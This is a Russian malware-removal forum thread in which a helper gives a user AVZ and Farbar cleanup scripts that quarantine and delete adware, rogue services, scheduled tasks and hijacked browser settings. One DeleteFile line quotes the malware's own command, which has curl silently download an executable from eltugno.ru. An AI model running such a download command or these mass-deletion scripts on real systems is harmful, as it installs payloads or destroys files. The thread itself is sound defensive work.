На ноутбуке возможно есть вирусы, помогите пожалуйста!

Printable View

03.02.2019, 12:07
Foxwill

Вложений: 1

На ноутбуке возможно есть вирусы, помогите пожалуйста!

После установки драйверов скачалось что-то еще. После этого у компьютера понизилась производительность раза в 2. Стал чаще лагать и т.д. Помогите избавится от них пожалуйста!
03.02.2019, 12:08
Info_bot

Уважаемый(ая) [B]Foxwill[/B], спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
03.02.2019, 12:47
Vvvyg

[url="http://virusinfo.info/showthread.php?t=7239"]Выполните скрипт в AVZ[/url]:[code]begin
TerminateProcessByName('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp');
StopService('0177541477233912mcinstcleanup');
StopService('swsedrvr_vw_1_10_0_25');
QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', '');
QuarantineFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', '');
QuarantineFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', '');
QuarantineFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', '');
QuarantineFile('C:\Program Files (x86)\amuleC\ed2k.exe', '');
QuarantineFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '');
QuarantineFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', '');
QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', '');
QuarantineFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', '');
QuarantineFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', '');
QuarantineFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', '');
QuarantineFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '');
QuarantineFile('C:\Program Files\ByteFence\ByteFence.exe', '');
QuarantineFile('c:\program files\bytefence\ByteFenceService.exe', '');
QuarantineFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', '');
QuarantineFile('C:\Program Files\UBar\UbarDriver.sys', '');
QuarantineFile('C:\Program Files\UBar\UbarService.exe', '');
QuarantineFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '');
QuarantineFile('C:\ProgramData\Doubleing\Doubleing.exe', '');
QuarantineFile('C:\ProgramData\hdtask\hdtask.exe', '');
QuarantineFile('C:\ProgramData\Logic Handler\set.exe', '');
QuarantineFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', '');
QuarantineFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', '');
QuarantineFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', '');
QuarantineFile('C:\WINDOWS\Microsoft\svchost.exe', '');
QuarantineFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', '');
QuarantineFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', '');
QuarantineFile('C:\WINDOWS\TEMP\017754~1.EXE', '');
QuarantineFileF('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\program files (x86)\amulec', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\programdata\doubleing', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
QuarantineFileF('c:\users\огурцов\appdata\local\hostinstaller', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 , 0);
QuarantineFileF('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\hnsn92F5.tmp', '');
DeleteFile('C:\Program Files (x86)\87684081-1451210377-11CB-A5D0-F6E7D98D013F\knsw5C1E.tmpfs', '');
DeleteFile('C:\Program Files (x86)\87684081-1477484938-11CB-A5D0-F6E7D98D013F\knsyC641.tmpfs', '');
DeleteFile('C:\Program Files (x86)\87684081-1479991071-11CB-A5D0-F6E7D98D013F\knsA992.tmp', '');
DeleteFile('C:\Program Files (x86)\amuleC\ed2k.exe', '');
DeleteFile('C:\Program Files (x86)\IconRunner\MoneyBot.exe', '32');
DeleteFile('C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe', '');
DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\QMUdisk64.sys', '');
DeleteFile('C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16923.222\softaal64.sys', '');
DeleteFile('C:\Program Files (x86)\WeatherChickn\WeatherChickn.exe', '');
DeleteFile('C:\Program Files (x86)\Youtube AdBlock\IEEF\qu_X9D.dll', '');
DeleteFile('C:\Program Files\7Q9Q65LS95\4E7W8PR7O.exe', '32');
DeleteFile('C:\Program Files\ByteFence\ByteFence.exe', '');
DeleteFile('c:\program files\bytefence\ByteFenceService.exe', '');
DeleteFile('c:\program files\bytefence\rtop\bin\rtop_svc.exe', '');
DeleteFile('C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll', '32');
DeleteFile('C:\Program Files\UBar\UbarDriver.sys', '');
DeleteFile('C:\Program Files\UBar\UbarService.exe', '');
DeleteFile('C:\Program Files\UYV96CZO7J\T5PQVB4YQ.exe', '32');
DeleteFile('C:\ProgramData\Doubleing\Doubleing.exe', '');
DeleteFile('C:\ProgramData\hdtask\hdtask.exe', '32');
DeleteFile('C:\ProgramData\Logic Handler\set.exe', '');
DeleteFile('C:\ProgramData\NetworkPacketManitor\Nettrans.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\DuckGo\duckgo.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\Hostinstaller\4266426696_monster.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\Kometa\StartButton\kometastartvx64.exe', '64');
DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\lumsystem\lumsystem.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\Local\MailruSetup\MailruSetup.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\ScriptWriter\ScriptWriter.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Local\yc\Application\yc.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\LocalLow\SearchGo\searchgo.dll', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\Adobe\Manager.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe -f -s -L http://eltugno.ru/f.exe -o "C:\Users\Огурцов\AppData\Roaming\curl\curl.exe"', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\curl\curl_7_54.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\app.py', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\ml.py', '32');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '32');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\mineonepapkamainj\trz26F4.tmp', '');
DeleteFile('C:\Users\Огурцов\AppData\Roaming\WindowsUpdater\Updater.exe', '');
DeleteFile('C:\Users\Огурцов\ReportSender\ReportSender.exe', '');
DeleteFile('C:\WINDOWS\Microsoft\svchost.exe', '');
DeleteFile('C:\WINDOWS\system32\drivers\swsedrvr_vw_1_10_0_25.sys', '');
DeleteFile('C:\WINDOWS\SysWOW64\SearchProtectService.exe', '');
DeleteFile('C:\WINDOWS\TEMP\017754~1.EXE', '');
DeleteFile('http:\eltugno.ru\f.exe', '');
ExecuteFile('schtasks.exe', '/delete /TN "ByteFence" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "DuckGo Task" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "LumProcess" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\MailruSetup" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\Manager" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\Multimedia\ReportSender" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "One System Care Monitor" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "ScriptWriter" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "Soft installer" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "WindowsUpdater" /F', 0, 15000, true);
DeleteService('0177541477233912mcinstcleanup');
DeleteService('ancykxdb');
DeleteService('anqnvoio');
DeleteService('apswdtxg');
DeleteService('aywzshgp');
DeleteService('backlh');
DeleteService('bbbudopp');
DeleteService('bcouyzjs');
DeleteService('bjsehlvo');
DeleteService('bozmbqij');
DeleteService('bpifnwbn');
DeleteService('bqgiiaih');
DeleteService('bycvkxab');
DeleteService('ByteFenceService');
DeleteService('chaeuizt');
DeleteService('cjsggimu');
DeleteService('coessqjo');
DeleteService('cvafeojm');
DeleteService('cytilizo');
DeleteService('czasafsn');
DeleteService('dbx');
DeleteService('dennzevk');
DeleteService('dkomupml');
DeleteService('Doubleing');
DeleteService('ebteumgs');
DeleteService('eclpjzhy');
DeleteService('ed2kidle');
DeleteService('eijcgadq');
DeleteService('ejdhbujs');
DeleteService('ejqmezgn');
DeleteService('exzpnbkc');
DeleteService('fikhcuvx');
DeleteService('flctpmkv');
DeleteService('fpozvpip');
DeleteService('fsppkmsm');
DeleteService('ftrievld');
DeleteService('ggbczjib');
DeleteService('grogkvul');
DeleteService('gypnyrpk');
DeleteService('hnybidnj');
DeleteService('hurqvgof');
DeleteService('hvmspoqn');
DeleteService('ilwmvcxg');
DeleteService('jlddrvts');
DeleteService('jqtdndvb');
DeleteService('jvtgngyq');
DeleteService('jwxbxmze');
DeleteService('khxlthud');
DeleteService('kvlyyfev');
DeleteService('lgsvhrfs');
DeleteService('LiveUpdateSvc');
DeleteService('lonekmwa');
DeleteService('lpodhrht');
DeleteService('lxhhogbx');
DeleteService('makmjdwm');
DeleteService('McComponentHostService');
DeleteService('mcqtjynl');
DeleteService('muiikavs');
DeleteService('naylrybp');
DeleteService('Nettrans');
DeleteService('nfhcuzwm');
DeleteService('nlwxeqhr');
DeleteService('nomsbdff');
DeleteService('nrbvdmvg');
DeleteService('nugobuse');
DeleteService('nvnprykv');
DeleteService('obzzxyvx');
DeleteService('ohxgsnag');
DeleteService('okiuazqx');
DeleteService('okvgqsba');
DeleteService('paplbcjx');
DeleteService('pejcktpo');
DeleteService('pkfahwgk');
DeleteService('pmpqtklp');
DeleteService('qfybyovi');
DeleteService('QMUdisk');
DeleteService('qnabfcdz');
DeleteService('qnyphnvj');
DeleteService('qprkqvxc');
DeleteService('qtvoxmki');
DeleteService('qxkidsjg');
DeleteService('rlzazkuc');
DeleteService('rngeiytu');
DeleteService('rtbhagez');
DeleteService('rtop');
DeleteService('rwzavqul');
DeleteService('ryshjglb');
DeleteService('snfbvbhr');
DeleteService('softaal');
DeleteService('sokylole');
DeleteService('SPS');
DeleteService('srbqkcgi');
DeleteService('SvcHost Service Host');
DeleteService('swsedrvr_vw_1_10_0_25');
DeleteService('tcuuadtw');
DeleteService('tdczeevt');
DeleteService('tddgzhju');
DeleteService('tglssguf');
DeleteService('tgrnveup');
DeleteService('thkzcpun');
DeleteService('tkskrchq');
DeleteService('TrueKeyScheduler');
DeleteService('TrueKeyServiceHelper');
DeleteService('txvipmsx');
DeleteService('tysjnfcx');
DeleteService('UbarCalloutDriver');
DeleteService('UbarPolicyProvider');
DeleteService('ufghthyv');
DeleteService('ujbugeqa');
DeleteService('umxkcunc');
DeleteService('uotgmlmb');
DeleteService('Updater.Mail.Ru');
DeleteService('UvConverter');
DeleteService('uxbsnitn');
DeleteService('uxgtprhf');
DeleteService('uzcxzozd');
DeleteService('WeatherChiknSrvr');
DeleteService('wfcgtqki');
DeleteService('wifpmdvy');
DeleteService('wssxrmyk');
DeleteService('wucotusy');
DeleteService('xdjbpzhr');
DeleteService('xdrveulz');
DeleteService('yiamwbab');
DeleteService('yrnymepm');
DeleteService('ytwykeaw');
DeleteService('zalvstec');
DeleteService('zazbfhvj');
DeleteFileMask('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f', '*', true);
DeleteFileMask('c:\program files (x86)\amulec', '*', true);
DeleteFileMask('c:\program files (x86)\iconrunner', '*', true);
DeleteFileMask('c:\program files (x86)\onesystemcare', '*', true);
DeleteFileMask('c:\program files (x86)\tencent', '*', true);
DeleteFileMask('c:\program files (x86)\weatherchickn', '*', true);
DeleteFileMask('c:\program files (x86)\youtube adblock', '*', true);
DeleteFileMask('c:\program files\7q9q65ls95', '*', true);
DeleteFileMask('c:\program files\bytefence', '*', true);
DeleteFileMask('c:\program files\ubar', '*', true);
DeleteFileMask('c:\program files\uyv96czo7j', '*', true);
DeleteFileMask('c:\programdata\doubleing', '*', true);
DeleteFileMask('c:\programdata\hdtask', '*', true);
DeleteFileMask('c:\programdata\logic handler', '*', true);
DeleteFileMask('c:\programdata\networkpacketmanitor', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\duckgo', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\hostinstaller', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\lumsystem', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\mailrusetup', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\scriptwriter', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\local\yc', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\locallow\searchgo', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\curl', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\currencyconvertor', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj', '*', true);
DeleteFileMask('c:\users\огурцов\appdata\roaming\windowsupdater', '*', true);
DeleteFileMask('c:\users\огурцов\reportsender', '*', true);
DeleteDirectory('c:\program files (x86)\87684081-1451210377-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\87684081-1477484938-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\87684081-1479991071-11cb-a5d0-f6e7d98d013f');
DeleteDirectory('c:\program files (x86)\amulec');
DeleteDirectory('c:\program files (x86)\iconrunner');
DeleteDirectory('c:\program files (x86)\onesystemcare');
DeleteDirectory('c:\program files (x86)\tencent');
DeleteDirectory('c:\program files (x86)\weatherchickn');
DeleteDirectory('c:\program files (x86)\youtube adblock');
DeleteDirectory('c:\program files\7q9q65ls95');
DeleteDirectory('c:\program files\bytefence');
DeleteDirectory('c:\program files\ubar');
DeleteDirectory('c:\program files\uyv96czo7j');
DeleteDirectory('c:\programdata\doubleing');
DeleteDirectory('c:\programdata\hdtask');
DeleteDirectory('c:\programdata\logic handler');
DeleteDirectory('c:\programdata\networkpacketmanitor');
DeleteDirectory('c:\users\огурцов\appdata\local\duckgo');
DeleteDirectory('c:\users\огурцов\appdata\local\hostinstaller');
DeleteDirectory('c:\users\огурцов\appdata\local\lumsystem');
DeleteDirectory('c:\users\огурцов\appdata\local\mailrusetup');
DeleteDirectory('c:\users\огурцов\appdata\local\scriptwriter');
DeleteDirectory('c:\users\огурцов\appdata\local\yc');
DeleteDirectory('c:\users\огурцов\appdata\locallow\searchgo');
DeleteDirectory('c:\users\огурцов\appdata\roaming\curl');
DeleteDirectory('c:\users\огурцов\appdata\roaming\currencyconvertor');
DeleteDirectory('c:\users\огурцов\appdata\roaming\microsoft\systemcertificates\my\ctls\mineonepapkamainj');
DeleteDirectory('c:\users\огурцов\appdata\roaming\windowsupdater');
DeleteDirectory('c:\users\огурцов\reportsender');
DelBHO('{2BC46CFA-4B00-4193-A7BD-6AD1D0BCB5BC}');
DelBHO('{598AEFC6-DD3C-4A63-9AC3-53FCF6155931}');
DelBHO('{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B}');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '6GMTU8RLCT');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'aebleyzkpy');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CurrencyConvertor');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'hdtask');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'K8J77YTFGJ');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'LumProcess');
RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'ycAutoLaunch_1C57F4F4FD8066828BC5E4D43E9AF813');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'APSDaemon');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'IconRunner');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
RebootWindows(false);
end.[/code]Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Скачайте [URL="http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/"]Farbar Recovery Scan Tool[/URL] и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
03.02.2019, 22:42
Foxwill

Спасибо большое, а что делать после того как я отправил архив с карантином? Ждать ответа?
04.02.2019, 06:46
Vvvyg

Дочитать моё сообщение до конца. И Вы пока вместо карантина засунули 1) сам AutoLogger и 2) его логи.
04.02.2019, 16:03
Foxwill

Вложений: 1

Извините пожалуйста за невнимательность....
Вот файл
04.02.2019, 22:07
Vvvyg

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:[CODE]CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\...\Run: [MailRuUpdater] => C:\Users\Огурцов\AppData\Local\Mail.Ru\MailRuUpdater.exe [4100312 2017-11-24] (Mail.Ru) <==== ATTENTION
AppInit_DLLs: C:\ProgramData\ApppaznoR\Quadtofind.dll => No File
AppInit_DLLs-x32: C:\ProgramData\ApppaznoR\Stim-Lam.dll => No File
ShellExecuteHooks: No Name - {83922134-9CE0-11E6-9D68-64006A5CFC23} - C:\Users\Огурцов\AppData\Roaming\Mdolybuers\Huqoent.dll -> No File <==== ATTENTION
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.376\SSScheduler.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Zaxar Games Browser.lnk [2017-11-02] <==== ATTENTION
ShortcutTarget: Zaxar Games Browser.lnk -> C:\Program Files (x86)\Zaxar\ZaxarLoader.exe (Zaxar LTD) <==== ATTENTION
ShortcutTarget: ProfitTaskMonitor.lnk -> C:\Program Files (x86)\ProfitTask\ProfitTaskMonitor.exe (No File)
GroupPolicy: Restriction - Chrome <==== ATTENTION
GroupPolicy\User: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-2316502943-295965077-1323287568-1001\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.oursurfing.com/web/?type=ds&ts=1445087024&z=d486f1b5cbe2d9f121db6f9gaz8z0wce5bfm5e1ocz&from=amt&uid=wdcxwd5000lpvx-08v0tt5_wd-wxc1a34d4616d4616&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616
HKU\S-1-5-21-2316502943-295965077-1323287568-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1478246974&z=2d729a5d79fdd8a964fb447gbz5m0b6oazeqatbq5m&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3D} URL = hxxp://firstsputnik.ru/?ri=1&uid=ab3b05442b67d72976b82968da1b6bad&q=
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.amisites.com/search/?type=ds&ts=1479716214&z=b130be61ca8b3544437fc87g5z5m1t4m7g5q1ofe2z&from=che0812&uid=WDCXWD5000LPVX-08V0TT5_WD-WXC1A34D4616D4616&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {A06ED961-D98F-4CF9-A89B-80AB11DB149C} URL = hxxp://go-search.ru/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B1B60E205-BA95-469A-87F0-C2C71B3A6798%7D&gp=832418
SearchScopes: HKU\S-1-5-21-2316502943-295965077-1323287568-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFqgp4F2dqqpnoYOs0vb2kBGtsNnrQmSzX4g4YVHHTW5j75Qxd6AUNHBycrlraEN1eWuVTdwSzwVHhsUbElK2OVNSYVd8hPOwbsDwNEb0FlSaal9sgmdDE_QgmcO47EyoULHAo_6i2UMVGJljdLPlwIi0rAAKeE,&q={searchTerms}
